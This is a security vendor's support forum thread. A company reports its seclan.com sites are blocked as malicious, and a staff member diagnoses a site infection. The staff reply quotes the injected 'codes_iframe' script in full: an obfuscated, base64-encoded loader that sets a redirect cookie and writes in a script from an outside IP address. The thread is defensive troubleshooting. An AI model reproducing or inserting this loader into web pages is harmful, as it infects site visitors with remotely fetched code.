Jump to content

Possible false positive - hxxps:\\www.seclan.com (81.19.112.23)


Go to solution Solved by Dashke,

Recommended Posts

Possible FP for hxxps://www.seclan.com (81.19.112.23)

 

 

Hello,

 

Our company has a problem related to Malwarebytes. We don’t know why our company websites are blocked in Malwarebytes?

 

Here’s a log-file from my computer’s Malwarebytes scan:

 

Malwarebytes

www.malwarebytes.com

 

-Log Details-

Scan Date: 4/16/21

Scan Time: 3:10 PM

Log File: afe7a99a-9eac-11eb-a9ed-78acc0ae97b2.json

 

-Software Information-

Version: 4.1.2.73

Components Version: 1.0.1003

Update Package Version: 1.0.39465

License: Trial

 

-System Information-

OS: Windows 10 (Build 19041.928)

CPU: x64

File System: NTFS

User: JOHENT-Z400\root

 

-Scan Summary-

Scan Type: Threat Scan

Scan Initiated By: Manual

Result: Completed

Objects Scanned: 377509

Threats Detected: 0

Threats Quarantined: 0

Time Elapsed: 6 min, 8 sec

 

-Scan Options-

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Detect

PUM: Detect

 

-Scan Details-

Process: 0

(No malicious items detected)

 

Module: 0

(No malicious items detected)

 

Registry Key: 0

(No malicious items detected)

 

Registry Value: 0

(No malicious items detected)

 

Registry Data: 0

(No malicious items detected)

 

Data Stream: 0

(No malicious items detected)

 

Folder: 0

(No malicious items detected)

 

File: 0

(No malicious items detected)

 

Physical Sector: 0

(No malicious items detected)

 

WMI: 0

(No malicious items detected)

 

(end)

 

And here’s the information flag that we get when entering into any of our company websites:

image.png.d5becce19814121caa3404397790e010.png

Here’s the corresponding log-file:

 

Malwarebytes

www.malwarebytes.com

 

-Log Details-

Protection Event Date: 4/16/21

Protection Event Time: 4:29 PM

Log File: bed98e18-9eb7-11eb-8107-78acc0ae97b2.json

 

-Software Information-

Version: 4.1.2.73

Components Version: 1.0.1003

Update Package Version: 1.0.39465

License: Trial

 

-System Information-

OS: Windows 10 (Build 19041.928)

CPU: x64

File System: NTFS

User: System

 

-Blocked Website Details-

Malicious Website: 1

, C:\Program Files (x86)\Google\Chrome\Application\chrome.exe, Blocked, -1, -1, 0.0.0, ,

 

-Website Data-

Category: Trojan

Domain: zammad.seclan.com

IP Address: 81.19.123.72

Port: 443

Type: Outbound

File: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

 

(end)

 

Here are the IP addresses of the sites:

 

ip=109.70.162.92&url=seafile.seclan.com

ip=81.19.112.23&url=www.seclan.com

ip=81.19.123.72&url=zammad.seclan.com

ip=109.70.160.99&url=smtp-auth.seclan.com

ip=81.19.112.26&url=kopano.seclan.com

 

It seems that every site, which is part of the seclan.com domain, is blocked.

I can’t figure out why? Could you please tell me how I can fix this?

 

Best Regards,

 

Jouni Henttonen

Seclan Ltd.

Link to post
Share on other sites
  • Staff
  • Solution

Hello Jouni,

It seems that your website has been infected with a malicious script -

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

Can you check the source code and remove it, please?

Link to post
Share on other sites
  • 2 weeks later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.